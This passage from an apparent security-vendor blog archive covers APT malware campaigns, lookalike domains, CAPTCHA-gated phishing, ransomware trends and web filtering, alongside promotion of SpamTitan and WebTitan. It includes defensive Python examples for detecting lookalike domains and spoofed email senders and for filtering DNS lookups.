The group is known for using fully featured malware which is often delivered via phishing emails and commercially available tools. The latest malware variant was identified by security researchers at Trend Micro, who tied the malware to APT32 due to code similarities with other malware variants known to have been used by the group. The malware is a macOS backdoor that allows the group to steal sensitive information such as business documents. The malware also gives the attackers the ability to download and install additional malicious programs on victim computers.
The malware is being delivered via phishing emails that have a zip file attachment which is disguised as a Microsoft Word document. If the recipient is convinced to open the attached file, no Word document will be opened, but the first stage of the payload will execute in the background. The first stage changes access permissions which allows the second stage payload to be executed, which prompts the third stage of the payload that downloads and installs the backdoor on the system. This multi-stage delivery of the backdoor helps the malware to evade security solutions.
Protecting against attacks involves blocking the initial attack vector to prevent the phishing emails from being delivered to end users. End user security awareness training should be provided, and employees conditioned not to open email attachments from unknown senders. It is also recommended to ensure computers are kept fully patched, as this will limit the ability of the group to use its malware to perform malicious actions.
Chinese TA416 APT Group Delivering New Variant of PlugX RAT
The APT group TA416 – aka Mustang Panda/Red Delta – is conducting a campaign to distribute a new variant of its PlugX Remote Access Trojan (RAT). TA416 is a nation-state-sponsored group with strong links to the Chinese government and has previously conducted attacks on a wide range of targets around the world.
The group is known for using spear phishing emails and social engineering techniques to deliver malware that allows the hackers to gain full control of an infected computer. The attacks are conducted for espionage purposes; however, the malware has an extensive range of capabilities. In addition to stealing data, the malware can copy, move, rename, execute, and delete files, log keystrokes, and perform many other actions.
The new campaign delivers two RAR archives, which act as droppers for its PlugX malware. The theme of the emails in the latest campaign is a supposed new agreement between the Vatican and the Chinese Communist Party.
The campaign was identified by researchers at Proofpoint, who could not pinpoint the exact delivery method; however, TA416 is known to use Google Drive and Dropbox URLs in its phishing emails to deliver malicious payloads. One of the RAR files is a self-extracting archive that extracts four files and executes an Adobelm.exe file, which delivers a Golang version of the PlugX malware. The recent update to the PlugX RAT helps it evade security solutions.
Combating the APT Threat
The tactics used by these and other APT groups to deliver malware are constantly changing, with phishing campaigns regularly tweaked to increase the likelihood of end users performing the desired action and to prevent the campaigns from being detected by anti-virus and anti-phishing solutions. The changes to the malware and campaigns are effective and can easily fool end users and bypass technical controls, especially signature-based antivirus solutions.
Advanced AI-based cybersecurity solutions are required to detect and block these threats. These solutions detect known malware variants and can also identify zero-day malware threats and never-before-seen phishing campaigns. The solutions work by protecting against the two most common attack vectors – email and the web – and prevent malicious messages from reaching inboxes and block downloads of malicious files from attacker-controlled websites.
Cybercriminals are using an increasing range of tactics, techniques and procedures to fool the unwary into disclosing their credentials or installing malware, which is making it hard for end users to distinguish between genuine and malicious messages.
It is common for cybercriminals to purchase lookalike domains for use in phishing scams and for distributing malware. Oftentimes the domains purchased are very similar to the domains they impersonate, aside from one or two changed letters.
For instance, the letters vv could be used in place of a w for a domain spoofing Wal-Mart – e.g. VVal-Mart. In internationalized domain name (IDN) homograph attacks, aka script spoofing, Greek, Latin, and Cyrillic letters are used in domains instead of standard letters. This can lead to domains being almost indistinguishable from the domains they are spoofing, especially since the web pages hosted on those domains include the logos and color schemes used on the official websites.
FBI Warns of Use of Spoofed FBI Domains
Recently the Federal Bureau of Investigation (FBI) issued a warning following the discovery that many FBI-related domain names have been purchased that closely resemble official FBI websites. While these domains are not believed to have been used for malicious purposes to date, it is probable that the individuals registering these domains were intending to use them in phishing attacks, for distributing malware, or for disinformation campaigns. The domains include fbidefense.com, fbimaryland, fbi-ny, fib.ca, fbi-intel.com, fbi.systems, and fbi.health.
These domains can be used to host phishing kits or exploit kits, but they can also be used to create official-looking email addresses. An email from one of these domains, with FBI in the name, could easily scare someone into taking the action demanded in the email, such as disclosing their login credentials or opening a malicious email attachment.
Legitimate Cloud Services Leveraged in Sophisticated Phishing Attacks
There have also been phishing campaigns detected in recent weeks that use legitimate cloud services to mask the malicious nature of the emails. Campaigns have been detected that use links to Google Forms, Google Docs, Dropbox, and cloud services from Amazon and Oracle. Emails are sent that include fake notifications with links to these cloud services; however, once the link is clicked, the user is taken through a series of redirects to a malicious website hosting fake Office 365 login prompts that steal credentials.
Several of these campaigns involved checks to make sure the recipient is a real person, with automated responses directed to official domains to prevent analysis. Phishers are also continuing to use typosquatting – the name given to the use of domains with natural typographical errors – to catch out careless typists.
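The lookalike techniques described in this post (vv standing in for w, IDN homographs built from Cyrillic or Greek letters, brand names embedded in unrelated registrations, and typosquatting) can be screened for on the defending side, for example when a new sender domain or link target is first seen. The following Python script is an added example written for this page; it is not TitanHQ code and not part of the original post. The protected-brand list, the confusables table, the multi-character substitutions and the 0.85 similarity threshold are constructed assumptions; a production tool would use the full Unicode confusables data and the Public Suffix List instead.

```python
import unicodedata
from difflib import SequenceMatcher

# Constructed list of brands to protect; a deployment would load its own from config.
PROTECTED_DOMAINS = ["walmart.com", "fbi.gov", "microsoft.com"]

# Constructed single-character confusables: letters from other scripts and digits that
# render like Latin letters. Real tools use the full Unicode confusables table.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",   # Cyrillic a, ie, o, er
    "\u0441": "c", "\u0445": "x", "\u0456": "i", "\u04cf": "l",   # Cyrillic es, ha, i, palochka
    "\u03b1": "a", "\u03bf": "o", "\u03bd": "v",                  # Greek alpha, omicron, nu
    "0": "o", "1": "l",
}
# Constructed multi-character confusables, applied after the single-character pass.
MULTI_CONFUSABLES = [("vv", "w"), ("rn", "m"), ("cl", "d")]
NEAR_MATCH_RATIO = 0.85  # constructed threshold for typo-style near matches


def decode_label(label: str) -> str:
    """Turn a punycode label (xn--...) back into Unicode; other labels pass through."""
    if not label.startswith("xn--"):
        return label
    try:
        return label.encode("ascii").decode("idna")
    except UnicodeError:
        return label  # undecodable punycode is analysed as-is


def scripts_in(label: str) -> set:
    """Unicode scripts (LATIN, CYRILLIC, GREEK, ...) of the letters in a label."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in label if ch.isalpha()}


def skeleton(label: str) -> str:
    """Fold a label to the ASCII string it visually resembles."""
    folded = []
    for ch in unicodedata.normalize("NFKC", label).lower():
        if ch in CONFUSABLES:
            folded.append(CONFUSABLES[ch])
        else:
            folded.append(unicodedata.normalize("NFD", ch)[0])  # drops accents: é -> e
    text = "".join(folded)
    for sequence, single in MULTI_CONFUSABLES:
        text = text.replace(sequence, single)
    return text


def analyze_domain(domain: str) -> dict:
    """Report why `domain` looks like a lookalike of a protected brand, if it does."""
    domain = domain.strip().rstrip(".").lower()
    labels = [decode_label(label) for label in domain.split(".")]
    findings = []
    for label in labels:
        scripts = scripts_in(label)
        if len(scripts) > 1:
            findings.append(f"mixed scripts {sorted(scripts)} in label {label!r}")
        elif any(ch in CONFUSABLES and not ch.isascii() for ch in label):
            findings.append(f"non-Latin confusable letters in label {label!r}")
    skel = ".".join(skeleton(label) for label in labels)
    for brand in PROTECTED_DOMAINS:
        if domain == brand or domain.endswith("." + brand):
            continue  # the brand itself or a genuine subdomain of it
        brand_keyword = brand.split(".")[0]
        if skel == brand:
            findings.append(f"visually identical to {brand}")
        elif SequenceMatcher(None, skel, brand).ratio() >= NEAR_MATCH_RATIO:
            findings.append(f"near match for {brand} (skeleton {skel!r})")
        elif any(brand_keyword in label for label in skel.split(".")):
            # Heuristic: brand name embedded in an unrelated registration (fbi-intel, fbi.systems)
            findings.append(f"contains brand keyword {brand_keyword!r} from {brand}")
    return {"domain": domain, "skeleton": skel, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for candidate in ["walmart.com", "vvalmart.com", "walmrat.com", "fbi-intel.com"]:
        print(candidate, analyze_domain(candidate))
```

The skeleton comparison catches both the vv/w trick and IDN homographs (the punycode form a mail gateway actually sees is decoded first), the mixed-script check flags a label that mixes Latin with Cyrillic or Greek even before any brand comparison, and the near-match ratio catches transposed or dropped letters. The keyword check is the noisiest of the three and is best used to raise a score rather than to block outright.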
Sophisticated Campaigns Call for Sophisticated Cybersecurity Defenses
The sophisticated nature of today’s phishing and malware campaigns, together with cybercriminals’ constantly changing tactics, techniques, and procedures, means it is becoming harder for end users to distinguish between genuine and malicious emails. End user security awareness training is still important, but it has never been more important to have effective technical solutions in place to ensure that these threats are identified and blocked before any harm is caused.
The first line of defense against phishing is an email security gateway solution through which all emails need to pass before they reach inboxes. These solutions need to use a range of advanced mechanisms for identifying malicious and suspicious emails, so should one mechanism fail to identify a malicious email, others are in place to provide protection.
SpamTitan from TitanHQ is one such solution that incorporates many layers of protection to detect and block phishing and malware attacks via email. Checks are performed on the message headers, content is analyzed, and machine learning is incorporated to identify never-before-seen threats, in addition to blacklisting of known malicious email addresses and domains. To block malware threats, SpamTitan uses dual anti-virus engines to block known threats and sandboxing to identify and block zero-day malware threats. Working seamlessly together, these mechanisms will block 99.97% of malicious messages.
An additional anti-phishing solution that you may not have considered is a web filtering solution. Web filters are important for blocking the web-based component of phishing attacks and preventing individuals from visiting sites used for malware delivery. A web filter can also block redirects to malicious websites that hide behind links to legitimate cloud services.
WebTitan from TitanHQ is a smart, DNS-based web filtering solution that uses automation and advanced analytics to block emerging phishing and other malicious URLs, not just those that have been already used in attacks and have been added to blacklists. Through the use of AI-based technology, WebTitan can provide protection from zero-minute threats.
Advanced cybersecurity defenses do not need to be complicated for end users to use. Both SpamTitan and WebTitan have been developed to be easy to implement, use, and maintain. While they incorporate all the required protections and allow advanced users to drill down and analyze threats, they can also easily be used to protect networks and devices by users with little technical skill. The ease of implementation, use, and maintenance together with the superb threat protection are why the solutions are consistently rated so highly on review sites such as Capterra, GetApp, Software Advice, and on Google Reviews.
To improve your defenses against cybersecurity threats delivered via email and via the web, give the TitanHQ team a call today and find out more about SpamTitan Email Security and WebTitan DNS filtering.
The first known ransomware attack occurred in 1989, but for many years afterwards this form of malware did not prove popular with cybercriminals. That started to change in 2013 with CryptoLocker, and the number of attacks – and ransomware variants – has continued to grow ever since.
Today, ransomware is one of the biggest malware threats faced by businesses. Ransomware attacks are no longer relatively small campaigns conducted by ransomware developers. Rather than conduct their own attacks, it is now common for ransomware developers to leave the distribution of the ransomware to a network of affiliates. Under the ransomware-as-a-service model, more attacks can be conducted and more ransoms will be paid as a result. Most ransomware operations now operate under this RaaS model and there is no shortage of affiliates willing to distribute the ransomware for a cut of the profits.
While ransomware was once used simply to encrypt files and prevent them from being accessed by businesses unless a ransom was paid for the keys to decrypt files, the Maze ransomware operators started stealing data in 2019 prior to file encryption to add an extra incentive for victims to pay up. Many other ransomware operations followed suit and either threatened to publish the stolen data or sell it on to other cybercriminals if the ransom is not paid.
Data theft prior to file encryption is fast becoming the norm. Coveware, a company that works with ransomware victims to resolve ransomware attacks (often entering into negotiations with the attackers on behalf of its clients), recently published a report that shows half of all ransomware attacks now involve data theft prior to file encryption. It may be possible to recover encrypted data from backups, but that will not prevent the publication or misuse of stolen data.
This tactic has proven to be effective for the ransomware gangs, but there have been many cases where payment of the ransom has not resulted in the deletion of stolen data. In the United States, several victims in the healthcare industry have paid the ransom demand only to receive a second demand for a payment to prevent stolen data from being released.
According to Coveware, the Sodinokibi ransomware gang is known to issue further demands after the initial payment is made, and it has been a similar case with Netwalker and Mespinoza ransomware. The operators of Conti ransomware provide proof that files are deleted after the ransom is paid, but that proof is faked.
Ransom demands are also increasing. The average ransom demand in Q3, 2020 was $234,000, up 31% from the previous quarter according to the Coveware Quarterly Ransomware Report.
The healthcare industry has been extensively targeted by ransomware gangs and attacks have increased during the COVID-19 pandemic. The healthcare industry is heavily reliant on data and attacks aim to encrypt patient data and steal medical records prior to encryption. If the ransom is not paid, the data has a high value and can be sold on easily.
Recently, a joint warning was issued by the U.S. Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA), in conjunction with the FBI and the Department of Health and Human Services, warning of an increased and imminent threat of targeted ransomware attacks on the healthcare and public health sectors. A few days after the alert was issued, 6 healthcare providers were attacked with Ryuk ransomware in a single day.
Ransomware attacks are here to stay for the foreseeable future. They will only start to decline when they are no longer profitable. With attacks at record levels and no guarantee that stolen data will be returned even if the ransom is paid, it is more important than ever for businesses and healthcare organizations to ensure their defenses are hardened against ransomware attacks.
Ransomware can be delivered using a variety of techniques. Vulnerabilities in software and operating systems are commonly exploited to gain access to networks, so vulnerability scanning is important for identifying exploitable vulnerabilities to ensure they are promptly addressed before they can be exploited.
Email remains one of the most common attack vectors, not only for delivering ransomware but also for delivering ransomware downloaders. Emotet and TrickBot are two Trojans commonly used to deliver ransomware as a secondary payload, and both are primarily delivered via email, as is BazarLoader, which has been used to deliver ransomware in many recent attacks.
To block this attack vector, an advanced AI-powered spam filter is required – one that is capable of not only detecting known malware threats, but zero-day malware and email attacks that have not been seen before. SpamTitan uses AI and machine learning techniques to identify these email threats at source and prevent them from being delivered to inboxes where employees unwittingly provide the attackers with access to their networks. In addition to dual anti-virus engines, SpamTitan has a sandboxing feature for identifying zero-day malware threats and SPF, DKIM, and DMARC to detect and block email impersonation attacks.
Ransomware, ransomware droppers, and other malware threats are often delivered via the Internet, so cybersecurity measures are needed to block this attack vector. WebTitan similarly uses AI and machine learning techniques to provide protection from websites used to deliver malware threats. The solution uses automation and advanced analytics to search through billions of URLs/IPs and phishing sites that could compromise a company and ensure those threats are blocked.
By implementing layered defenses, it is possible to block the majority of threats, but it is still important to ensure that your data is protected in the event that an attack succeeds. You should make sure that come what may, your data is secured.
A good approach to adopt is the 3-2-1 backup strategy, which involves making three backups, storing the copies on two different media (tape, disc, or cloud for instance), and ensuring one copy is stored securely off site. Should an attack succeed, you will not be at the mercy of the attackers and will at least be able to recover your data without paying the ransom.
If you want to improve your defenses against ransomware, give the TitanHQ team a call today for information and advice on the steps you can take to harden your defenses.
Phishers are constantly coming up with new scams that abuse trust. People tend to trust their favorite brands and when email communications are sent by those companies there is a tendency for the emails to be trusted. The same is true when emails are sent from email contacts such as work colleagues and friends. Cybercriminals take advantage of trust to get users to take a specific action, such as clicking on an embedded hyperlink in an email or opening an email attachment.
Many businesses now provide security awareness training to employees and try to teach them to always be vigilant and never to trust emails implicitly, even if they have been sent by known contacts. Just because an email has been sent from a known and trusted email account does not mean the message is genuine. Email accounts are often compromised and used to send phishing emails. The Emotet Trojan hijacks email accounts and uses them to send copies of itself to the victim’s contacts, and several other malware variants do the same. Email addresses are also spoofed. The display name may be correct or believable, but the actual email account used to send the message is anything but.
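The spoofing tactics in the paragraph above (a believable display name on an unrelated sending address, a forged From address) are what the header-level checks of an email gateway look for, including the SPF, DKIM and DMARC checks mentioned in the ransomware post earlier on this page. The following Python script is an added example for this page, not TitanHQ code. The three messages are constructed, and the alignment logic is a simplified version of DMARC evaluation: it trusts an Authentication-Results header already added by the receiving gateway, does not consult the sender domain's published DMARC policy, and approximates the organisational domain by the last two labels rather than the Public Suffix List.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample messages; none of these is a real captured email.
GENUINE = """\
From: Payroll <payroll@example.com>
To: alice@example.com
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dkim=pass header.d=example.com
Subject: March payslip

Your payslip is attached.
"""

# Display-name spoof: the name looks like an internal address, the real sender is elsewhere,
# and Reply-To diverts replies to a third domain. SPF and DKIM legitimately pass for the
# sending domain, which is why authentication alone does not catch this.
DISPLAY_NAME_SPOOF = """\
From: "ceo@example.com" <news@newsletter.example>
Reply-To: ceo.office@freemail.example
To: alice@example.com
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=newsletter.example; dkim=pass header.d=newsletter.example
Subject: Urgent wire transfer

Please process the attached invoice today.
"""

# Forged From address: the message claims to be from example.com, but nothing authenticates it.
FORGED_FROM = """\
From: CEO <ceo@example.com>
To: alice@example.com
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=bulk.example; dkim=none
Subject: Quick request

Are you at your desk?
"""

ADDRESS_RE = re.compile(r"[\w.+-]+@[\w.-]+")


def org_domain(domain: str) -> str:
    """Relaxed-alignment organisational domain: the last two labels (no Public Suffix List here)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def parse_auth_results(header: str) -> dict:
    """Map 'spf'/'dkim' to (result, authenticated domain) from an Authentication-Results header."""
    results = {}
    for clause in header.split(";")[1:]:  # first clause is the authserv-id (e.g. mx.example.com)
        method_match = re.match(r"(spf|dkim)=(\w+)", clause.strip())
        if not method_match:
            continue
        method, result = method_match.groups()
        domain_match = re.search(r"(?:smtp\.mailfrom|header\.d)=([^\s;]+)", clause)
        domain = domain_match.group(1).split("@")[-1].lower() if domain_match else ""
        results[method] = (result.lower(), domain)
    return results


def analyze_message(raw: str) -> dict:
    """Flag display-name spoofing, Reply-To diversion and unaligned From domains."""
    msg = message_from_string(raw)
    display, sender = parseaddr(msg.get("From", ""))
    from_domain = sender.split("@")[-1].lower()
    findings = []

    embedded = ADDRESS_RE.search(display)
    if embedded and embedded.group(0).lower() != sender.lower():
        findings.append(f"display name shows {embedded.group(0)} but sender is {sender}")

    _, reply_to = parseaddr(msg.get("Reply-To", ""))
    if reply_to and org_domain(reply_to.split("@")[-1]) != org_domain(from_domain):
        findings.append(f"Reply-To {reply_to} diverts replies away from {from_domain}")

    # DMARC-style check: at least one of SPF or DKIM must pass for a domain aligned with From
    auth = parse_auth_results(msg.get("Authentication-Results", ""))
    aligned = any(result == "pass" and org_domain(domain) == org_domain(from_domain)
                  for result, domain in auth.values())
    if not aligned:
        findings.append(f"no SPF/DKIM pass aligned with {from_domain}: {auth}")

    return {"sender": sender, "display_name": display, "findings": findings, "suspicious": bool(findings)}


if __name__ == "__main__":
    for label, raw in [("genuine", GENUINE), ("display-name spoof", DISPLAY_NAME_SPOOF), ("forged From", FORGED_FROM)]:
        print(label, analyze_message(raw))
```

The second sample is the instructive one: SPF and DKIM both pass, because the newsletter service really did send it, so only the display-name and Reply-To checks catch it. The third sample is the classic forged From, which the alignment check catches on its own. A real gateway would combine both kinds of signal with the content and reputation checks described elsewhere on this page.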
Another tactic is now being used by at least one cybercriminal group that similarly abuses trust, albeit in a new way. A phishing campaign, which was first detected on September 21, 2020, uses the challenge-response test CAPTCHA to simultaneously make the campaign believable and also to reduce the probability of the scam being detected by email security solutions.
Internet users will be familiar with CAPTCHA, although maybe not by name. The CAPTCHA system is used by many websites as a way to determine if a website visitor is a human or a bot, most commonly on forms.
Google uses CAPTCHA and requires users to pass a pictorial challenge in which it is necessary to select all the images in a group that feature a car, bicycle, bus, or traffic lights. If you pass the challenge you will be allowed to proceed; if you fail you will not. Other versions involve entering a number or code word that has been heavily disguised in an image.
While these CAPTCHA challenges can be annoying, they are associated with security so if a website has one of these challenges, subconsciously people tend to feel more secure. However, as with a website starting with HTTPS, it does not mean the website is genuine.
In this new phishing campaign, users are likely to feel more secure when credentials are requested since they had to pass a CAPTCHA test, especially considering the page on which the challenge was set up looks just like the genuine login prompt for Office 365. The background is the same, as is the login prompt. The only difference between the genuine login page and the fake version is the URL.
Security teams face a challenge detecting and blocking these phishing pages as email security solutions, despite having AI-based detection mechanisms, are essentially bots and, as such, cannot pass a CAPTCHA challenge.
A second tactic is also used to evade detection. The scammers have set up their campaign so that only a specific range of IP addresses – the range used by the targeted company – is presented with the CAPTCHA test on the fraudulent domain. Any visitor from an IP address outside that range is redirected to the genuine Microsoft login page.
While these scams help to ensure that malicious emails are delivered to inboxes, organizations do not need to be totally reliant on their employees recognizing the scams and taking appropriate action (reporting the email to the IT security team).
With a web filtering solution in place, attempts to visit known malicious websites will be blocked. When malicious domains are detected they are automatically added to a web filter’s blacklist, and any attempts to visit malicious domains will be blocked.
WebTitan is a low maintenance security solution that can be set up in about 5 minutes and will protect against the web-based component of phishing attacks and will block malware downloads from malicious websites. WebTitan works in tandem with email security solutions to provide greater protection against malware and phishing attacks. The solution can also be used to control the content that employees and guest network users can access over the internet, whether they are on the network or working remotely.
If you have not implemented a web filter or are unhappy with your current solution, give the WebTitan team a call to find out more. A product demonstration can be arranged, you can have a free trial of the solution, and assistance can be provided to help you get the most out of WebTitan during your trial.
The Internet opened up a world of new opportunities for businesses, allowing them to get in touch with customers around the world, explore new markets, find new suppliers, and access a wealth of knowledge. Web filtering solutions allow businesses to control internet access and monitor its use by employees and guest users, but why is web filtering in the workplace necessary, what are the benefits, and what are the risks of not filtering the internet? In this post we will explore the benefits of web filtering in the workplace.
What Exactly is a Web Filter?
You will no doubt be aware of spam filters, which are used to carefully control what emails are delivered to inboxes, blocking threats such as phishing emails and malware. Spam filters may also scan outbound email and apply controls to prevent data loss and malicious emails from being sent externally. A web filter performs a similar function for Internet access.
A web filter sits between your end users and the Internet and applies controls over the websites that can be accessed and the files that can be downloaded. The main function of a web filter is content control to restrict access to NSFW websites and block phishing websites and malware downloads.
Reasons for Web Filtering in the Workplace
There are many different reasons for web filtering in the workplace. These include:
Blocking access to inappropriate web content
Web filters are often used to prevent employees from accessing NSFW content such as pornography, images of violence, and hate speech, which can lead to the development of a hostile work environment. Businesses such as coffee shops, along with libraries and schools, use web filtering to create a family-friendly online environment and prevent minors from accessing age-inappropriate content.
Blocking online threats
Phishing attacks are now commonplace and there is a significant risk of malware being downloaded from the Internet. A web filter blocks these threats, by first preventing users from accessing known malicious websites and secondly by preventing downloads of malicious files.
Controlling bandwidth use
There will be a limited amount of bandwidth available and sometimes that bandwidth may be squeezed, resulting in considerable latency that affects all Internet users on the network. A web filter can be used to restrict bandwidth use by blocking certain online activities – video streaming for instance – ensuring sufficient bandwidth is available for all.
Improving productivity
The Internet makes slacking off very easy for employees. Businesses can suffer major productivity losses from employees accessing certain types of websites which serve no purpose in the workplace. A web filter can be used to block access to social media networks, dating websites, gambling and gaming sites, and video streaming services such as YouTube.
Preventing legal issues
Legal issues can arise from uncontrolled Internet use. If an employee or user of a Wi-Fi network engages in illegal activity, such as downloading pirated software, music, or video from P2P file sharing networks, the business owner may be liable for their actions. Web filters can also prevent data theft by blocking access to file sharing sites.
Monitoring Internet use
You may want to adopt a permissive approach and only restrict access to illegal content and malicious websites, but a web filter gives you insights into what users are doing online. This can help you to prevent and resolve HR issues and identify insider threats.
How is Web Filtering in the Workplace Achieved?
There are several ways that web filtering in the workplace can be implemented. A physical appliance can be purchased through which all Internet traffic is routed, with controls applied by a system administrator. Cloud-based web filters are now much more popular. With filtering taking place in the cloud, no equipment purchases are required.
DNS-based web filtering sees filtering take place at the DNS lookup stage of a web request, with filtering occurring without content being downloaded. Cloud-based filters that operate at the DNS level also avoid any latency issues, which can be a problem with physical appliances.
Methods of Web Filtering
There are various methods of web filtering in the workplace, with most solutions using a combination of all.
Whitelists and Blacklists
Blacklists are used to block access to specific domains and URLs, either through third-party or user-generated blacklists. Whitelists are used to always allow access to a specific URL or domain, regardless of the content filtering controls put in place.
Category Filtering
Category filtering is the easiest way of exercising content control. A web filtering solution will assign websites into categories based on the content of the website. Using a checkbox in the UI, the system administrator can select which categories of content should be blocked. Commonly blocked categories include pornography, gambling, gaming, dating, social media, news, and webmail.
Keyword Filtering
Web filters can perform analyses of web content to detect certain keywords and can assign a score to each URL. Thresholds can be set for individual users, departments, or the entire organization, and if that threshold is exceeded, the content will not be displayed.
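To make the whitelist/blacklist, category and keyword mechanisms of this section concrete at the DNS lookup stage described earlier, here is an added Python example written for this page; it is not WebTitan code and says nothing about how WebTitan is built. The category map, the two lists, the per-group policies, the keyword weights and the sinkhole address are all constructed, and the query packets are built in-process so the script runs offline. Because a DNS-level filter only ever sees the hostname, the keyword score here is applied to the name; the page-content scoring the section describes would run where page bodies are visible, such as in a proxy.

```python
import struct

SINKHOLE_IP = "10.0.0.53"  # constructed: address of the block page shown to the user

# Constructed category database; real filters classify millions of domains.
CATEGORIES = {
    "social.example": "social_media",
    "video.example": "streaming",
    "malware-host.example": "malware",
}
BLOCKLIST = {"phish-login.example"}          # constructed user/third-party blacklist
ALLOWLIST = {"docs.social.example"}          # constructed whitelist: always allowed
GROUP_POLICY = {                             # constructed: categories blocked per user group
    "default": {"malware", "phishing", "adult", "social_media"},
    "marketing": {"malware", "phishing", "adult"},
}
KEYWORD_SCORES = {"login": 2, "verify": 2, "secure": 1, "account": 1}  # constructed weights
KEYWORD_THRESHOLD = 3


def parents(name: str):
    """Yield a name and each of its parent domains: a.b.c -> a.b.c, b.c, c."""
    labels = name.split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])


def decide(name: str, group: str = "default"):
    """Policy order: whitelist, then blacklist, then category, then keyword score."""
    name = name.lower().rstrip(".")
    blocked_categories = GROUP_POLICY.get(group, GROUP_POLICY["default"])
    for candidate in parents(name):
        if candidate in ALLOWLIST:
            return "allow", f"whitelisted via {candidate}"
    for candidate in parents(name):
        if candidate in BLOCKLIST:
            return "block", f"blacklisted via {candidate}"
    for candidate in parents(name):
        category = CATEGORIES.get(candidate)
        if category:
            if category in blocked_categories:
                return "block", f"category {category} blocked for group {group}"
            return "allow", f"category {category} permitted for group {group}"
    score = sum(weight for keyword, weight in KEYWORD_SCORES.items() if keyword in name)
    if score >= KEYWORD_THRESHOLD:
        return "block", f"keyword score {score} >= {KEYWORD_THRESHOLD}"
    return "allow", "no policy match"


def build_query(name: str, qtype: int = 1, tid: int = 0x1234) -> bytes:
    """Build a minimal DNS query packet (constructed input so the example runs offline)."""
    qname = b"".join(bytes([len(l)]) + l.encode("ascii") for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", tid, 0x0100, 1, 0, 0, 0) + qname + struct.pack("!HH", qtype, 1)


def parse_query(packet: bytes):
    """Return (transaction id, qname, qtype, raw question section) of a standard query."""
    tid = struct.unpack("!H", packet[:2])[0]
    pos, labels = 12, []
    while packet[pos] != 0:            # question names are never compressed in a query
        length = packet[pos]
        labels.append(packet[pos + 1:pos + 1 + length].decode("ascii"))
        pos += 1 + length
    pos += 1                           # skip the terminating zero length
    qtype = struct.unpack("!H", packet[pos:pos + 2])[0]
    return tid, ".".join(labels), qtype, packet[12:pos + 4]


def handle(packet: bytes, group: str = "default"):
    """Apply policy at lookup time. Returns (decision, reason, response); response is None
    when the query should be forwarded to the upstream resolver unchanged."""
    tid, name, qtype, question = parse_query(packet)
    decision, reason = decide(name, group)
    if decision == "allow":
        return decision, reason, None
    if qtype != 1:                     # only A queries get the sinkhole; others get NXDOMAIN
        return decision, reason, struct.pack("!HHHHHH", tid, 0x8183, 1, 0, 0, 0) + question
    header = struct.pack("!HHHHHH", tid, 0x8180, 1, 1, 0, 0)
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, 60, 4)   # pointer to qname, A, IN, TTL 60, rdlength 4
    rdata = bytes(int(octet) for octet in SINKHOLE_IP.split("."))
    return decision, reason, header + question + rr + rdata


if __name__ == "__main__":
    for host in ["phish-login.example", "social.example", "docs.social.example", "login-verify.example"]:
        print(host, handle(build_query(host)))
```

Two design points are worth noting. Whitelist entries are checked before anything else and match on the exact name or any parent, which is what lets docs.social.example through even though social.example is in a blocked category for the default group. A blocked A query is answered with the sinkhole address so the browser lands on a block page rather than timing out, while blocked queries of other types get NXDOMAIN, since answering an AAAA query with an A record would be malformed.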
WebTitan Cloud: Workplace Web Filtering Made Simple
WebTitan Cloud is a powerful web filtering solution that provides visibility into the online activities of users and allows controls to be set easily to manage Internet access and block online threats that could threaten your business. WebTitan Cloud has been developed to be easy to set up and use, with no technical prowess required to use the solution.
Highly granular filtering controls allow precision control over the content that can be accessed, without overblocking and preventing important web content from being accessed. The solution is DNS-based, so no equipment purchases or software downloads are necessary, and there is zero latency.
WebTitan Cloud protects on-site workers on the network, Wi-Fi users, and remote workers no matter where they access the Internet.
There is a transparent pricing policy, no optional extras, the product is extremely competitively priced, and customers benefit from industry-leading customer support.
Managed Service Providers (MSPs) that want to add web filtering to their service stacks benefit from many MSP-friendly features such as multiple hosting options, a brandable white-label version of the product, monthly billing, and pricing that accommodates rapidly changing numbers of seats.
To find out more about the full benefits of WebTitan Cloud, or to arrange a product demonstration, give the WebTitan team a call today.
Many companies have adopted a hybrid workforce model, where employees spend some time in the office and some time working from home. This working model works well for the business and gives employees the flexibility they want.
Some businesses had already transitioned to a fully remote workforce, but then 2020 arrived and virtually everyone had to do the same. Research from Gartner suggests that during the coronavirus pandemic, 88% of companies made remote working mandatory.
The rapid change from an office-based to a remote workforce caused major headaches for IT teams, but it has allowed businesses to continue to function during incredibly challenging times. There have been productivity issues and technical problems, but businesses have weathered the storm and have continued to operate. Employees can still stay in touch and collaborate online using chat platforms, videoconferencing, and the telephone, and some businesses have reported an increase in productivity since switching to remote working.
While there are now many different methods of collaborating and maintaining contact, remote working has meant businesses and their employees have been forced to rely on email to a much greater extent. The increased reliance on email means it is now more important than ever to ensure emails can be accessed come what may, even if email servers are down. Should anything happen to the email system, work can grind to a halt.
Many businesses use emails as a store of essential information and much of the data in emails is not stored elsewhere. Figures from IDC indicate around 60% of business-critical data resides in emails and email attachments and that was before the pandemic.
There are many regulations covering business data, including at the federal, state, and industry level. There are set retention times for certain types of data, regardless of where the information is stored. If the information is stored in emails, then that information must be protected and secured against accidental or deliberate deletion until the retention period is over.
Backups of emails can be performed to meet certain regulations, but problems exist when it comes to recovering emails. Finding emails in backups can be an incredibly time-consuming process that can take days or weeks. Even finding the correct backup media can be a major challenge in itself, and then finding emails in a backup – which is not easily searchable – can seem a near impossible task.
The way to ensure privacy and security, meet compliance requirements, and guarantee that emails and attachments are never lost is to use an email archiving service. Email archives are created for long term data storage. Email archives can be easily searched, so when emails need to be found and recovered, the process takes seconds or minutes. A tamper-proof record of all emails is retained for compliance purposes and to protect against data loss and ensure business continuity in the event of disaster.
Many businesses have implemented an on-premises email archive, but this is far from ideal in a world where virtually everyone is working remotely. After the pandemic is over, many employees will return to the office, but remote working looks set to stay. The best option is therefore to use an email archiving solution that perfectly suits the remote working or hybrid working model.
